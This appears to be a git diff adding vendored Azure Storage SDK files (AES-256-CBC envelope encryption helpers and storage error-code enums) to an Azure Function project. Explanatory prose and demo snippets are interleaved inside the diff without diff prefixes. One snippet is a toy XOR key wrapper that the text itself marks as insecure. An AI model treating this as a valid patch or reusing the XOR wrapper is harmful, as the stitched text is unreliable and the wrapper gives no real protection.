wrapped_content_key['KeyId'] = kek.get_kid() + wrapped_content_key['EncryptedKey'] = encode_base64(wrapped_cek) + wrapped_content_key['Algorithm'] = kek.get_key_wrap_algorithm() + + encryption_agent = OrderedDict() + encryption_agent['Protocol'] = _ENCRYPTION_PROTOCOL_V1 + encryption_agent['EncryptionAlgorithm'] = _EncryptionAlgorithm.AES_CBC_256 + + encryption_data_dict = OrderedDict() + encryption_data_dict['WrappedContentKey'] = wrapped_content_key + encryption_data_dict['EncryptionAgent'] = encryption_agent + encryption_data_dict['ContentEncryptionIV'] = encode_base64(iv) + encryption_data_dict['KeyWrappingMetadata'] = {'EncryptionLibrary': 'Python ' + VERSION} + + return encryption_data_dict + + +def _dict_to_encryption_data(encryption_data_dict): + ''' + Converts the specified dictionary to an EncryptionData object for + eventual use in decryption. + + :param dict encryption_data_dict: + The dictionary containing the encryption data. + :return: an _EncryptionData object built from the dictionary. 
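
The classes above model the envelope that _generate_encryption_data_dict serializes: a wrapped content key, the agent (protocol and algorithm), and the IV. A runnable sketch of the same layout with a toy key-encryption-key (XOR is NOT secure; it only satisfies the wrap_key/get_kid/get_key_wrap_algorithm interface validated earlier):

    import os, json, base64

    class LocalKek:
        # Toy KEK, for illustrating the envelope layout only.
        def __init__(self, key):
            self._key = key
        def wrap_key(self, cek):
            return bytes(b ^ self._key[i % len(self._key)] for i, b in enumerate(cek))
        def get_kid(self):
            return "local-kek-1"
        def get_key_wrap_algorithm(self):
            return "XOR-DEMO"

    kek = LocalKek(os.urandom(32))
    cek, iv = os.urandom(32), os.urandom(16)
    envelope = {
        "WrappedContentKey": {
            "KeyId": kek.get_kid(),
            "EncryptedKey": base64.b64encode(kek.wrap_key(cek)).decode(),
            "Algorithm": kek.get_key_wrap_algorithm(),
        },
        "EncryptionAgent": {"Protocol": "1.0", "EncryptionAlgorithm": "AES_CBC_256"},
        "ContentEncryptionIV": base64.b64encode(iv).decode(),
    }
    print(json.dumps(envelope, indent=2))
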
+ :rtype: _EncryptionData + ''' + try: + if encryption_data_dict['EncryptionAgent']['Protocol'] != _ENCRYPTION_PROTOCOL_V1: + raise ValueError("Unsupported encryption version.") + except KeyError: + raise ValueError("Unsupported encryption version.") + wrapped_content_key = encryption_data_dict['WrappedContentKey'] + wrapped_content_key = _WrappedContentKey(wrapped_content_key['Algorithm'], + decode_base64_to_bytes(wrapped_content_key['EncryptedKey']), + wrapped_content_key['KeyId']) + + encryption_agent = encryption_data_dict['EncryptionAgent'] + encryption_agent = _EncryptionAgent(encryption_agent['EncryptionAlgorithm'], + encryption_agent['Protocol']) + + if 'KeyWrappingMetadata' in encryption_data_dict: + key_wrapping_metadata = encryption_data_dict['KeyWrappingMetadata'] + else: + key_wrapping_metadata = None + + encryption_data = _EncryptionData(decode_base64_to_bytes(encryption_data_dict['ContentEncryptionIV']), + encryption_agent, + wrapped_content_key, + key_wrapping_metadata) + + return encryption_data + + +def _generate_AES_CBC_cipher(cek, iv): + ''' + Generates and returns an encryption cipher for AES CBC using the given cek and iv. + + :param bytes[] cek: The content encryption key for the cipher. + :param bytes[] iv: The initialization vector for the cipher. + :return: A cipher for encrypting in AES256 CBC. + :rtype: ~cryptography.hazmat.primitives.ciphers.Cipher + ''' + + backend = default_backend() + algorithm = AES(cek) + mode = CBC(iv) + return Cipher(algorithm, mode, backend) + + +def _validate_and_unwrap_cek(encryption_data, key_encryption_key=None, key_resolver=None): + ''' + Extracts and returns the content_encryption_key stored in the encryption_data object + and performs necessary validation on all parameters. + :param _EncryptionData encryption_data: + The encryption metadata of the retrieved value. + :param obj key_encryption_key: + The key_encryption_key used to unwrap the cek. Please refer to high-level service object + instance variables for more details. + :param func key_resolver: + A function used that, given a key_id, will return a key_encryption_key. Please refer + to high-level service object instance variables for more details. + :return: the content_encryption_key stored in the encryption_data object. + :rtype: bytes[] + ''' + + _validate_not_none('content_encryption_IV', encryption_data.content_encryption_IV) + _validate_not_none('encrypted_key', encryption_data.wrapped_content_key.encrypted_key) + + if _ENCRYPTION_PROTOCOL_V1 != encryption_data.encryption_agent.protocol: + raise ValueError('Encryption version is not supported.') + + content_encryption_key = None + + # If the resolver exists, give priority to the key it finds. + if key_resolver is not None: + key_encryption_key = key_resolver(encryption_data.wrapped_content_key.key_id) + + _validate_not_none('key_encryption_key', key_encryption_key) + if not hasattr(key_encryption_key, 'get_kid') or not callable(key_encryption_key.get_kid): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_kid')) + if not hasattr(key_encryption_key, 'unwrap_key') or not callable(key_encryption_key.unwrap_key): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'unwrap_key')) + if encryption_data.wrapped_content_key.key_id != key_encryption_key.get_kid(): + raise ValueError('Provided or resolved key-encryption-key does not match the id of key used to encrypt.') + # Will throw an exception if the specified algorithm is not supported. 
+    content_encryption_key = key_encryption_key.unwrap_key(encryption_data.wrapped_content_key.encrypted_key,
+                                                           encryption_data.wrapped_content_key.algorithm)
+    _validate_not_none('content_encryption_key', content_encryption_key)
+
+    return content_encryption_key
+
+
+def _decrypt_message(message, encryption_data, key_encryption_key=None, resolver=None):
+    '''
+    Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding.
+    Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek).
+    Returns the original plaintext.
+
+    :param str message:
+        The ciphertext to be decrypted.
+    :param _EncryptionData encryption_data:
+        The metadata associated with this ciphertext.
+    :param object key_encryption_key:
+        The user-provided key-encryption-key. Must implement the following methods:
+        unwrap_key(key, algorithm)
+            - returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
+        get_kid()
+            - returns a string key id for this key-encryption-key.
+    :param function resolver(kid):
+        The user-provided key resolver. Uses the kid string to return a key-encryption-key
+        implementing the interface defined above.
+    :return: The decrypted plaintext.
+    :rtype: str
+    '''
+    _validate_not_none('message', message)
+    content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver)
+
+    if _EncryptionAlgorithm.AES_CBC_256 != encryption_data.encryption_agent.encryption_algorithm:
+        raise ValueError('Specified encryption algorithm is not supported.')
+
+    cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV)
+
+    # decrypt data
+    decrypted_data = message
+    decryptor = cipher.decryptor()
+    decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize())
+
+    # unpad data
+    unpadder = PKCS7(128).unpadder()
+    decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize())
+
+    return decrypted_data
+
+
+def encrypt_blob(blob, key_encryption_key):
+    '''
+    Encrypts the given blob using AES256 in CBC mode with 128 bit padding.
+    Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
+    Returns a json-formatted string containing the encryption metadata. This method should
+    only be used when a blob is small enough for single shot upload. Encrypting larger blobs
+    is done as a part of the upload_data_chunks method.
+
+    :param bytes blob:
+        The blob to be encrypted.
+    :param object key_encryption_key:
+        The user-provided key-encryption-key. Must implement the following methods:
+        wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
+        get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
+        get_kid()--returns a string key id for this key-encryption-key.
+    :return: A tuple of json-formatted string containing the encryption metadata and the encrypted blob data.
+    :rtype: (str, bytes)
+    '''
+
+    _validate_not_none('blob', blob)
+    _validate_not_none('key_encryption_key', key_encryption_key)
+    _validate_key_encryption_key_wrap(key_encryption_key)
+
+    # AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
+    content_encryption_key = urandom(32)
+    initialization_vector = urandom(16)
+
+    cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
+
+    # PKCS7 with 16 byte blocks ensures compatibility with AES.
+    padder = PKCS7(128).padder()
+    padded_data = padder.update(blob) + padder.finalize()
+
+    # Encrypt the data.
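
The encrypt/decrypt pair above boils down to AES-256-CBC with PKCS7 padding from the cryptography package. A self-contained roundtrip showing the same primitives in isolation:

    import os
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher
    from cryptography.hazmat.primitives.ciphers.algorithms import AES
    from cryptography.hazmat.primitives.ciphers.modes import CBC
    from cryptography.hazmat.primitives.padding import PKCS7

    cek, iv = os.urandom(32), os.urandom(16)
    cipher = Cipher(AES(cek), CBC(iv), default_backend())

    # Pad to the 16-byte AES block size, then encrypt.
    padder = PKCS7(128).padder()
    padded = padder.update(b"hello blob") + padder.finalize()
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()

    # Decrypt and strip the padding again.
    decryptor = cipher.decryptor()
    unpadder = PKCS7(128).unpadder()
    plaintext = unpadder.update(decryptor.update(ciphertext) + decryptor.finalize())
    plaintext += unpadder.finalize()
    assert plaintext == b"hello blob"
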
+    encryptor = cipher.encryptor()
+    encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
+    encryption_data = _generate_encryption_data_dict(key_encryption_key, content_encryption_key,
+                                                     initialization_vector)
+    encryption_data['EncryptionMode'] = 'FullBlob'
+
+    return dumps(encryption_data), encrypted_data
+
+
+def generate_blob_encryption_data(key_encryption_key):
+    '''
+    Generates the encryption_metadata for the blob.
+
+    :param bytes key_encryption_key:
+        The key-encryption-key used to wrap the cek associated with this blob.
+    :return: A tuple containing the cek and iv for this blob as well as the
+        serialized encryption metadata for the blob.
+    :rtype: (bytes, bytes, str)
+    '''
+    encryption_data = None
+    content_encryption_key = None
+    initialization_vector = None
+    if key_encryption_key:
+        _validate_key_encryption_key_wrap(key_encryption_key)
+        content_encryption_key = urandom(32)
+        initialization_vector = urandom(16)
+        encryption_data = _generate_encryption_data_dict(key_encryption_key,
+                                                         content_encryption_key,
+                                                         initialization_vector)
+        encryption_data['EncryptionMode'] = 'FullBlob'
+        encryption_data = dumps(encryption_data)
+
+    return content_encryption_key, initialization_vector, encryption_data
+
+
+def decrypt_blob(require_encryption, key_encryption_key, key_resolver,
+                 content, start_offset, end_offset, response_headers):
+    '''
+    Decrypts the given blob contents and returns only the requested range.
+
+    :param bool require_encryption:
+        Whether or not the calling blob service requires objects to be decrypted.
+    :param object key_encryption_key:
+        The user-provided key-encryption-key. Must implement the following methods:
+        wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
+        get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
+        get_kid()--returns a string key id for this key-encryption-key.
+    :param key_resolver(kid):
+        The user-provided key resolver. Uses the kid string to return a key-encryption-key
+        implementing the interface defined above.
+    :return: The decrypted blob content.
+    :rtype: bytes
+    '''
+    try:
+        encryption_data = _dict_to_encryption_data(loads(response_headers['x-ms-meta-encryptiondata']))
+    except:  # pylint: disable=bare-except
+        if require_encryption:
+            raise ValueError(
+                'Encryption required, but received data does not contain appropriate metadata. '
+                'Data was either not encrypted or metadata has been lost.')
+
+        return content
+
+    if encryption_data.encryption_agent.encryption_algorithm != _EncryptionAlgorithm.AES_CBC_256:
+        raise ValueError('Specified encryption algorithm is not supported.')
+
+    blob_type = response_headers['x-ms-blob-type']
+
+    iv = None
+    unpad = False
+    if 'content-range' in response_headers:
+        content_range = response_headers['content-range']
+        # Format: 'bytes x-y/size'
+
+        # Ignore the word 'bytes'
+        content_range = content_range.split(' ')
+
+        content_range = content_range[1].split('-')
+        content_range = content_range[1].split('/')
+        end_range = int(content_range[0])
+        blob_size = int(content_range[1])
+
+        if start_offset >= 16:
+            iv = content[:16]
+            content = content[16:]
+            start_offset -= 16
+        else:
+            iv = encryption_data.content_encryption_IV
+
+        if end_range == blob_size - 1:
+            unpad = True
+    else:
+        unpad = True
+        iv = encryption_data.content_encryption_IV
+
+    if blob_type == 'PageBlob':
+        unpad = False
+
+    content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, key_resolver)
+    cipher = _generate_AES_CBC_cipher(content_encryption_key, iv)
+    decryptor = cipher.decryptor()
+
+    content = decryptor.update(content) + decryptor.finalize()
+    if unpad:
+        unpadder = PKCS7(128).unpadder()
+        content = unpadder.update(content) + unpadder.finalize()
+
+    return content[start_offset: len(content) - end_offset]
+
+
+def get_blob_encryptor_and_padder(cek, iv, should_pad):
+    encryptor = None
+    padder = None
+
+    if cek is not None and iv is not None:
+        cipher = _generate_AES_CBC_cipher(cek, iv)
+        encryptor = cipher.encryptor()
+        padder = PKCS7(128).padder() if should_pad else None
+
+    return encryptor, padder
+
+
+def encrypt_queue_message(message, key_encryption_key):
+    '''
+    Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding.
+    Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
+    Returns a json-formatted string containing the encrypted message and the encryption metadata.
+
+    :param object message:
+        The plain text message to be encrypted.
+    :param object key_encryption_key:
+        The user-provided key-encryption-key. Must implement the following methods:
+        wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
+        get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
+        get_kid()--returns a string key id for this key-encryption-key.
+    :return: A json-formatted string containing the encrypted message and the encryption metadata.
+    :rtype: str
+    '''
+
+    _validate_not_none('message', message)
+    _validate_not_none('key_encryption_key', key_encryption_key)
+    _validate_key_encryption_key_wrap(key_encryption_key)
+
+    # AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
+    content_encryption_key = os.urandom(32)
+    initialization_vector = os.urandom(16)
+
+    # Queue encoding functions all return unicode strings, and encryption should
+    # operate on binary strings.
+    message = message.encode('utf-8')
+
+    cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
+
+    # PKCS7 with 16 byte blocks ensures compatibility with AES.
+    padder = PKCS7(128).padder()
+    padded_data = padder.update(message) + padder.finalize()
+
+    # Encrypt the data.
+    encryptor = cipher.encryptor()
+    encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
+
+    # Build the dictionary structure.
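
Ranged downloads of encrypted blobs exploit CBC's structure: when the requested range does not start at byte 0, sixteen extra leading bytes were fetched and serve as the IV, so decrypt_blob strips them and shifts start_offset. A toy restatement of just that bookkeeping:

    def split_range_iv(content, start_offset, whole_blob_iv):
        # Mirrors the start_offset >= 16 branch in decrypt_blob above.
        if start_offset >= 16:
            return content[:16], content[16:], start_offset - 16
        return whole_blob_iv, content, start_offset

    iv, body, adjusted = split_range_iv(b"A" * 16 + b"<ciphertext>", 16, b"\x00" * 16)
    assert iv == b"A" * 16 and body == b"<ciphertext>" and adjusted == 0
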
+    queue_message = {'EncryptedMessageContents': encode_base64(encrypted_data),
+                     'EncryptionData': _generate_encryption_data_dict(key_encryption_key,
+                                                                      content_encryption_key,
+                                                                      initialization_vector)}
+
+    return dumps(queue_message)
+
+
+def decrypt_queue_message(message, response, require_encryption, key_encryption_key, resolver):
+    '''
+    Returns the decrypted message contents from an EncryptedQueueMessage.
+    If no encryption metadata is present, will return the unaltered message.
+    :param str message:
+        The JSON formatted QueueEncryptedMessage contents with all associated metadata.
+    :param bool require_encryption:
+        If set, will enforce that the retrieved messages are encrypted and decrypt them.
+    :param object key_encryption_key:
+        The user-provided key-encryption-key. Must implement the following methods:
+        unwrap_key(key, algorithm)
+            - returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
+        get_kid()
+            - returns a string key id for this key-encryption-key.
+    :param function resolver(kid):
+        The user-provided key resolver. Uses the kid string to return a key-encryption-key
+        implementing the interface defined above.
+    :return: The plain text message from the queue message.
+    :rtype: str
+    '''
+
+    try:
+        message = loads(message)
+
+        encryption_data = _dict_to_encryption_data(message['EncryptionData'])
+        decoded_data = decode_base64_to_bytes(message['EncryptedMessageContents'])
+    except (KeyError, ValueError):
+        # Message was not JSON formatted and so was not encrypted,
+        # or the user provided a JSON formatted message.
+        if require_encryption:
+            raise ValueError('Message was not encrypted.')
+
+        return message
+    try:
+        return _decrypt_message(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8')
+    except Exception as error:
+        raise HttpResponseError(
+            message="Decryption failed.",
+            response=response,
+            error=error)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py
new file mode 100644
index 0000000..ce75846
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py
@@ -0,0 +1,482 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
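
The pass-through behavior in decrypt_queue_message is worth noting: anything that is not a well-formed encryption envelope is returned untouched unless require_encryption is set. A condensed, runnable sketch of that fallback:

    import json

    def maybe_decrypt(raw, require_encryption=False):
        # Mirrors the except branch above.
        try:
            envelope = json.loads(raw)
            envelope["EncryptionData"] and envelope["EncryptedMessageContents"]
        except (ValueError, KeyError, TypeError):
            if require_encryption:
                raise ValueError("Message was not encrypted.")
            return raw
        return "<decrypted via _decrypt_message>"  # placeholder for the real path

    assert maybe_decrypt("plain text") == "plain text"
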
+# -------------------------------------------------------------------------- +# pylint: disable=too-many-instance-attributes +from enum import Enum + +from azure.core import CaseInsensitiveEnumMeta + + +def get_enum_value(value): + if value is None or value in ["None", ""]: + return None + try: + return value.value + except AttributeError: + return value + + +class StorageErrorCode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + # Generic storage values + ACCOUNT_ALREADY_EXISTS = "AccountAlreadyExists" + ACCOUNT_BEING_CREATED = "AccountBeingCreated" + ACCOUNT_IS_DISABLED = "AccountIsDisabled" + AUTHENTICATION_FAILED = "AuthenticationFailed" + AUTHORIZATION_FAILURE = "AuthorizationFailure" + NO_AUTHENTICATION_INFORMATION = "NoAuthenticationInformation" + CONDITION_HEADERS_NOT_SUPPORTED = "ConditionHeadersNotSupported" + CONDITION_NOT_MET = "ConditionNotMet" + EMPTY_METADATA_KEY = "EmptyMetadataKey" + INSUFFICIENT_ACCOUNT_PERMISSIONS = "InsufficientAccountPermissions" + INTERNAL_ERROR = "InternalError" + INVALID_AUTHENTICATION_INFO = "InvalidAuthenticationInfo" + INVALID_HEADER_VALUE = "InvalidHeaderValue" + INVALID_HTTP_VERB = "InvalidHttpVerb" + INVALID_INPUT = "InvalidInput" + INVALID_MD5 = "InvalidMd5" + INVALID_METADATA = "InvalidMetadata" + INVALID_QUERY_PARAMETER_VALUE = "InvalidQueryParameterValue" + INVALID_RANGE = "InvalidRange" + INVALID_RESOURCE_NAME = "InvalidResourceName" + INVALID_URI = "InvalidUri" + INVALID_XML_DOCUMENT = "InvalidXmlDocument" + INVALID_XML_NODE_VALUE = "InvalidXmlNodeValue" + MD5_MISMATCH = "Md5Mismatch" + METADATA_TOO_LARGE = "MetadataTooLarge" + MISSING_CONTENT_LENGTH_HEADER = "MissingContentLengthHeader" + MISSING_REQUIRED_QUERY_PARAMETER = "MissingRequiredQueryParameter" + MISSING_REQUIRED_HEADER = "MissingRequiredHeader" + MISSING_REQUIRED_XML_NODE = "MissingRequiredXmlNode" + MULTIPLE_CONDITION_HEADERS_NOT_SUPPORTED = "MultipleConditionHeadersNotSupported" + OPERATION_TIMED_OUT = "OperationTimedOut" + OUT_OF_RANGE_INPUT = "OutOfRangeInput" + OUT_OF_RANGE_QUERY_PARAMETER_VALUE = "OutOfRangeQueryParameterValue" + REQUEST_BODY_TOO_LARGE = "RequestBodyTooLarge" + RESOURCE_TYPE_MISMATCH = "ResourceTypeMismatch" + REQUEST_URL_FAILED_TO_PARSE = "RequestUrlFailedToParse" + RESOURCE_ALREADY_EXISTS = "ResourceAlreadyExists" + RESOURCE_NOT_FOUND = "ResourceNotFound" + SERVER_BUSY = "ServerBusy" + UNSUPPORTED_HEADER = "UnsupportedHeader" + UNSUPPORTED_XML_NODE = "UnsupportedXmlNode" + UNSUPPORTED_QUERY_PARAMETER = "UnsupportedQueryParameter" + UNSUPPORTED_HTTP_VERB = "UnsupportedHttpVerb" + + # Blob values + APPEND_POSITION_CONDITION_NOT_MET = "AppendPositionConditionNotMet" + BLOB_ALREADY_EXISTS = "BlobAlreadyExists" + BLOB_NOT_FOUND = "BlobNotFound" + BLOB_OVERWRITTEN = "BlobOverwritten" + BLOB_TIER_INADEQUATE_FOR_CONTENT_LENGTH = "BlobTierInadequateForContentLength" + BLOCK_COUNT_EXCEEDS_LIMIT = "BlockCountExceedsLimit" + BLOCK_LIST_TOO_LONG = "BlockListTooLong" + CANNOT_CHANGE_TO_LOWER_TIER = "CannotChangeToLowerTier" + CANNOT_VERIFY_COPY_SOURCE = "CannotVerifyCopySource" + CONTAINER_ALREADY_EXISTS = "ContainerAlreadyExists" + CONTAINER_BEING_DELETED = "ContainerBeingDeleted" + CONTAINER_DISABLED = "ContainerDisabled" + CONTAINER_NOT_FOUND = "ContainerNotFound" + CONTENT_LENGTH_LARGER_THAN_TIER_LIMIT = "ContentLengthLargerThanTierLimit" + COPY_ACROSS_ACCOUNTS_NOT_SUPPORTED = "CopyAcrossAccountsNotSupported" + COPY_ID_MISMATCH = "CopyIdMismatch" + FEATURE_VERSION_MISMATCH = "FeatureVersionMismatch" + INCREMENTAL_COPY_BLOB_MISMATCH = 
"IncrementalCopyBlobMismatch" + INCREMENTAL_COPY_OF_ERALIER_VERSION_SNAPSHOT_NOT_ALLOWED = "IncrementalCopyOfEralierVersionSnapshotNotAllowed" + INCREMENTAL_COPY_SOURCE_MUST_BE_SNAPSHOT = "IncrementalCopySourceMustBeSnapshot" + INFINITE_LEASE_DURATION_REQUIRED = "InfiniteLeaseDurationRequired" + INVALID_BLOB_OR_BLOCK = "InvalidBlobOrBlock" + INVALID_BLOB_TIER = "InvalidBlobTier" + INVALID_BLOB_TYPE = "InvalidBlobType" + INVALID_BLOCK_ID = "InvalidBlockId" + INVALID_BLOCK_LIST = "InvalidBlockList" + INVALID_OPERATION = "InvalidOperation" + INVALID_PAGE_RANGE = "InvalidPageRange" + INVALID_SOURCE_BLOB_TYPE = "InvalidSourceBlobType" + INVALID_SOURCE_BLOB_URL = "InvalidSourceBlobUrl" + INVALID_VERSION_FOR_PAGE_BLOB_OPERATION = "InvalidVersionForPageBlobOperation" + LEASE_ALREADY_PRESENT = "LeaseAlreadyPresent" + LEASE_ALREADY_BROKEN = "LeaseAlreadyBroken" + LEASE_ID_MISMATCH_WITH_BLOB_OPERATION = "LeaseIdMismatchWithBlobOperation" + LEASE_ID_MISMATCH_WITH_CONTAINER_OPERATION = "LeaseIdMismatchWithContainerOperation" + LEASE_ID_MISMATCH_WITH_LEASE_OPERATION = "LeaseIdMismatchWithLeaseOperation" + LEASE_ID_MISSING = "LeaseIdMissing" + LEASE_IS_BREAKING_AND_CANNOT_BE_ACQUIRED = "LeaseIsBreakingAndCannotBeAcquired" + LEASE_IS_BREAKING_AND_CANNOT_BE_CHANGED = "LeaseIsBreakingAndCannotBeChanged" + LEASE_IS_BROKEN_AND_CANNOT_BE_RENEWED = "LeaseIsBrokenAndCannotBeRenewed" + LEASE_LOST = "LeaseLost" + LEASE_NOT_PRESENT_WITH_BLOB_OPERATION = "LeaseNotPresentWithBlobOperation" + LEASE_NOT_PRESENT_WITH_CONTAINER_OPERATION = "LeaseNotPresentWithContainerOperation" + LEASE_NOT_PRESENT_WITH_LEASE_OPERATION = "LeaseNotPresentWithLeaseOperation" + MAX_BLOB_SIZE_CONDITION_NOT_MET = "MaxBlobSizeConditionNotMet" + NO_PENDING_COPY_OPERATION = "NoPendingCopyOperation" + OPERATION_NOT_ALLOWED_ON_INCREMENTAL_COPY_BLOB = "OperationNotAllowedOnIncrementalCopyBlob" + PENDING_COPY_OPERATION = "PendingCopyOperation" + PREVIOUS_SNAPSHOT_CANNOT_BE_NEWER = "PreviousSnapshotCannotBeNewer" + PREVIOUS_SNAPSHOT_NOT_FOUND = "PreviousSnapshotNotFound" + PREVIOUS_SNAPSHOT_OPERATION_NOT_SUPPORTED = "PreviousSnapshotOperationNotSupported" + SEQUENCE_NUMBER_CONDITION_NOT_MET = "SequenceNumberConditionNotMet" + SEQUENCE_NUMBER_INCREMENT_TOO_LARGE = "SequenceNumberIncrementTooLarge" + SNAPSHOT_COUNT_EXCEEDED = "SnapshotCountExceeded" + SNAPHOT_OPERATION_RATE_EXCEEDED = "SnaphotOperationRateExceeded" + SNAPSHOTS_PRESENT = "SnapshotsPresent" + SOURCE_CONDITION_NOT_MET = "SourceConditionNotMet" + SYSTEM_IN_USE = "SystemInUse" + TARGET_CONDITION_NOT_MET = "TargetConditionNotMet" + UNAUTHORIZED_BLOB_OVERWRITE = "UnauthorizedBlobOverwrite" + BLOB_BEING_REHYDRATED = "BlobBeingRehydrated" + BLOB_ARCHIVED = "BlobArchived" + BLOB_NOT_ARCHIVED = "BlobNotArchived" + + # Queue values + INVALID_MARKER = "InvalidMarker" + MESSAGE_NOT_FOUND = "MessageNotFound" + MESSAGE_TOO_LARGE = "MessageTooLarge" + POP_RECEIPT_MISMATCH = "PopReceiptMismatch" + QUEUE_ALREADY_EXISTS = "QueueAlreadyExists" + QUEUE_BEING_DELETED = "QueueBeingDeleted" + QUEUE_DISABLED = "QueueDisabled" + QUEUE_NOT_EMPTY = "QueueNotEmpty" + QUEUE_NOT_FOUND = "QueueNotFound" + + # File values + CANNOT_DELETE_FILE_OR_DIRECTORY = "CannotDeleteFileOrDirectory" + CLIENT_CACHE_FLUSH_DELAY = "ClientCacheFlushDelay" + DELETE_PENDING = "DeletePending" + DIRECTORY_NOT_EMPTY = "DirectoryNotEmpty" + FILE_LOCK_CONFLICT = "FileLockConflict" + INVALID_FILE_OR_DIRECTORY_PATH_NAME = "InvalidFileOrDirectoryPathName" + PARENT_NOT_FOUND = "ParentNotFound" + READ_ONLY_ATTRIBUTE = "ReadOnlyAttribute" + 
SHARE_ALREADY_EXISTS = "ShareAlreadyExists" + SHARE_BEING_DELETED = "ShareBeingDeleted" + SHARE_DISABLED = "ShareDisabled" + SHARE_NOT_FOUND = "ShareNotFound" + SHARING_VIOLATION = "SharingViolation" + SHARE_SNAPSHOT_IN_PROGRESS = "ShareSnapshotInProgress" + SHARE_SNAPSHOT_COUNT_EXCEEDED = "ShareSnapshotCountExceeded" + SHARE_SNAPSHOT_OPERATION_NOT_SUPPORTED = "ShareSnapshotOperationNotSupported" + SHARE_HAS_SNAPSHOTS = "ShareHasSnapshots" + CONTAINER_QUOTA_DOWNGRADE_NOT_ALLOWED = "ContainerQuotaDowngradeNotAllowed" + + # DataLake values + CONTENT_LENGTH_MUST_BE_ZERO = 'ContentLengthMustBeZero' + PATH_ALREADY_EXISTS = 'PathAlreadyExists' + INVALID_FLUSH_POSITION = 'InvalidFlushPosition' + INVALID_PROPERTY_NAME = 'InvalidPropertyName' + INVALID_SOURCE_URI = 'InvalidSourceUri' + UNSUPPORTED_REST_VERSION = 'UnsupportedRestVersion' + FILE_SYSTEM_NOT_FOUND = 'FilesystemNotFound' + PATH_NOT_FOUND = 'PathNotFound' + RENAME_DESTINATION_PARENT_PATH_NOT_FOUND = 'RenameDestinationParentPathNotFound' + SOURCE_PATH_NOT_FOUND = 'SourcePathNotFound' + DESTINATION_PATH_IS_BEING_DELETED = 'DestinationPathIsBeingDeleted' + FILE_SYSTEM_ALREADY_EXISTS = 'FilesystemAlreadyExists' + FILE_SYSTEM_BEING_DELETED = 'FilesystemBeingDeleted' + INVALID_DESTINATION_PATH = 'InvalidDestinationPath' + INVALID_RENAME_SOURCE_PATH = 'InvalidRenameSourcePath' + INVALID_SOURCE_OR_DESTINATION_RESOURCE_TYPE = 'InvalidSourceOrDestinationResourceType' + LEASE_IS_ALREADY_BROKEN = 'LeaseIsAlreadyBroken' + LEASE_NAME_MISMATCH = 'LeaseNameMismatch' + PATH_CONFLICT = 'PathConflict' + SOURCE_PATH_IS_BEING_DELETED = 'SourcePathIsBeingDeleted' + + +class DictMixin(object): + + def __setitem__(self, key, item): + self.__dict__[key] = item + + def __getitem__(self, key): + return self.__dict__[key] + + def __repr__(self): + return str(self) + + def __len__(self): + return len(self.keys()) + + def __delitem__(self, key): + self.__dict__[key] = None + + def __eq__(self, other): + """Compare objects by comparing all attributes.""" + if isinstance(other, self.__class__): + return self.__dict__ == other.__dict__ + return False + + def __ne__(self, other): + """Compare objects by comparing all attributes.""" + return not self.__eq__(other) + + def __str__(self): + return str({k: v for k, v in self.__dict__.items() if not k.startswith('_')}) + + def has_key(self, k): + return k in self.__dict__ + + def update(self, *args, **kwargs): + return self.__dict__.update(*args, **kwargs) + + def keys(self): + return [k for k in self.__dict__ if not k.startswith('_')] + + def values(self): + return [v for k, v in self.__dict__.items() if not k.startswith('_')] + + def items(self): + return [(k, v) for k, v in self.__dict__.items() if not k.startswith('_')] + + def get(self, key, default=None): + if key in self.__dict__: + return self.__dict__[key] + return default + + +class LocationMode(object): + """ + Specifies the location the request should be sent to. This mode only applies + for RA-GRS accounts which allow secondary read access. All other account types + must use PRIMARY. + """ + + PRIMARY = 'primary' #: Requests should be sent to the primary location. + SECONDARY = 'secondary' #: Requests should be sent to the secondary location, if possible. + + +class ResourceTypes(object): + """ + Specifies the resource types that are accessible with the account SAS. 
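
Two properties of StorageErrorCode fall out of its declaration as a str enum with CaseInsensitiveEnumMeta, shown below (the import assumes this vendored module is on the path, matching the file added in this diff):

    from azure.storage.blob._shared.models import StorageErrorCode

    # Member lookup by name is case-insensitive via CaseInsensitiveEnumMeta,
    assert StorageErrorCode["blob_not_found"] is StorageErrorCode.BLOB_NOT_FOUND
    # and members compare equal to their wire values because it is a str enum.
    assert StorageErrorCode.BLOB_NOT_FOUND == "BlobNotFound"
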
